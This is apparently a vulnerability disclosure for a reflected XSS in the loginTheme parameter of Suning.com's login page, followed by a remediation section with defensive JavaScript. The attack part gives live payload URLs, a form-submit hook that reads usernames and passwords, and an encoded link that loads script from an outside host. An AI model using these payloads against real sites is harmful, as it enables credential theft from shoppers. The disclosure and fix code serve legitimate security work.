XSS vulnerability on a Suning.com (苏宁易购) sub-site can be used to obtain account usernames and passwords
The Suning.com login page has a reflected XSS vulnerability. The URL is:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c
Although the loginTheme parameter is filtered to some extent, HTML tags such as <a> and <img> are still allowed through.
The simplest test is:
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Cimg%20src=%22test
An image then appears in the member login box (the screenshot is not included here):

The next step is building the injected code so that it loads a JS file, and bypassing the browser's XSS filter. So far I have only managed to get the JS to load in Firefox; in IE and Chrome it has not loaded yet. I'm sure the experts here can find a way.
The JS that gets loaded is:

```javascript
// jQuery, run in the context of the login page: hook the form submit
// and read the username and password fields
$("form").submit(function( event ) {
    alert($("input[name='username']").val() + '=' + $("input[name='password']").val());
});
```
The URL used in Firefox is built as follows (javascript:eval + String.fromCharCode):
https://passport.suning.com/ids/login?service=https%253A%252F%252Fmember.suning.com%252Fwebapp%252Fwcs%252Fstores%252Fauth%253FtargetUrl%253Dhttps%25253A%25252F%25252Fwww.suning.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSNTrustLogonInterceptorCmd%25253FstoreId%25253D10052%252526catalogId%25253D10051%252526app_id%25253D1007%252526target_url%25253Dhttps%25253A%25252F%25252Fpay.suning.com%25252Fepp-portal%25252Fuseraccount%25252Fuser-account%252521initUserAccount.action%252526trust_sn%25253D4a41a43b5d79408ea974a80b25f966fb&method=GET&loginTheme=b2c%22%3E%3Ca%20href%3D%22javascript%3Aeval%28String.fromCharCode%2895,108,111,97,100,74,115,40,34,104,116,116,112,115,58,47,47,111,119,97,102,112,101,46,115,105,110,97,97,112,112,46,99,111,109,47,115,116,97,116,105,99,47,116,101,115,116,46,106,115,34,41%29%29;%22%20id=%22a
Here an <a> tag is injected; when the user clicks into the input box the JS is loaded, and on submit the username and password can be captured.
I don't need to explain how this can be exploited.

Fix:
Filter the loginTheme parameter.
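The report's fix is a single line, so here is what "filter the loginTheme parameter" has to mean in practice. The following is an added example, not Suning's code: a hypothetical server-side rendering of the login form in which `loginTheme` lands inside an HTML attribute, exactly the context the report's `"><img` payload breaks out of. The "unsafe" version mimics the kind of deny-list filter the report observed (tags like `<a>` and `<img>` pass through). The hardened version does two independent things: it validates `loginTheme` against an allow-list of known theme names (the names and the default are assumptions) and it HTML-attribute-encodes whatever it emits, so that even a value that slips past the allow-list cannot close the attribute or open a tag. The test payload is the one from the report, decoded once as the server would decode it.

```javascript
// Added example (not Suning's code). Demonstrates why deny-list filtering
// of loginTheme is insufficient and what a proper fix looks like.

// The report's test payload, decoded once (a server decodes the query
// string once before using the value).
const REPORT_PAYLOAD = decodeURIComponent('b2c%22%3E%3Cimg%20src=%22test');

// --- Vulnerable: deny-list filter + raw interpolation into an attribute ---
// Assumed filter: strips <script> tags only, which is consistent with the
// report's observation that <a> and <img> still get through.
function denyListFilter(value) {
  return String(value).replace(/<\/?script[^>]*>/gi, '');
}

function renderLoginFormUnsafe(loginTheme) {
  const theme = denyListFilter(loginTheme);
  // The attribute is closed by the payload's `">`, so anything after it
  // becomes markup.
  return `<form class="login" data-theme="${theme}">` +
         `<input name="username"><input name="password"></form>`;
}

// --- Hardened: allow-list validation + attribute encoding ---
// Hypothetical set of theme names the login page actually supports.
const ALLOWED_THEMES = new Set(['b2c', 'b2b']);
const DEFAULT_THEME = 'b2c';

// Encode the five characters that matter inside a double-quoted attribute.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Validation: unknown values fall back to the default rather than being
// echoed back to the browser.
function selectTheme(loginTheme) {
  return ALLOWED_THEMES.has(loginTheme) ? loginTheme : DEFAULT_THEME;
}

function renderLoginFormSafe(loginTheme) {
  const theme = selectTheme(loginTheme);
  return `<form class="login" data-theme="${encodeAttr(theme)}">` +
         `<input name="username"><input name="password"></form>`;
}

// Encoding alone (no allow-list) is shown separately to make the point that
// output encoding is the layer that actually prevents attribute breakout;
// the allow-list is defense in depth.
function renderLoginFormEncodedOnly(loginTheme) {
  return `<form class="login" data-theme="${encodeAttr(loginTheme)}">` +
         `<input name="username"><input name="password"></form>`;
}

// Simple check a reviewer or a log-scanning rule can apply to a rendered
// page: does the untrusted value end up opening a new tag?
function breaksOutOfAttribute(html, tagName) {
  return new RegExp(`<${tagName}[\\s>]`, 'i').test(html);
}

// Stand-alone run
if (typeof require !== 'undefined' && require.main === module) {
  console.log('payload:', REPORT_PAYLOAD);
  console.log('unsafe :', renderLoginFormUnsafe(REPORT_PAYLOAD));
  console.log('safe   :', renderLoginFormSafe(REPORT_PAYLOAD));
}
```

The allow-list is the right fix when, as here, the parameter only ever selects from a fixed set of server-known themes; encoding is what protects the page if that assumption is ever relaxed. The `breaksOutOfAttribute` check is the kind of assertion that belongs in a unit test for the login template so that a regression of this bug is caught before deployment.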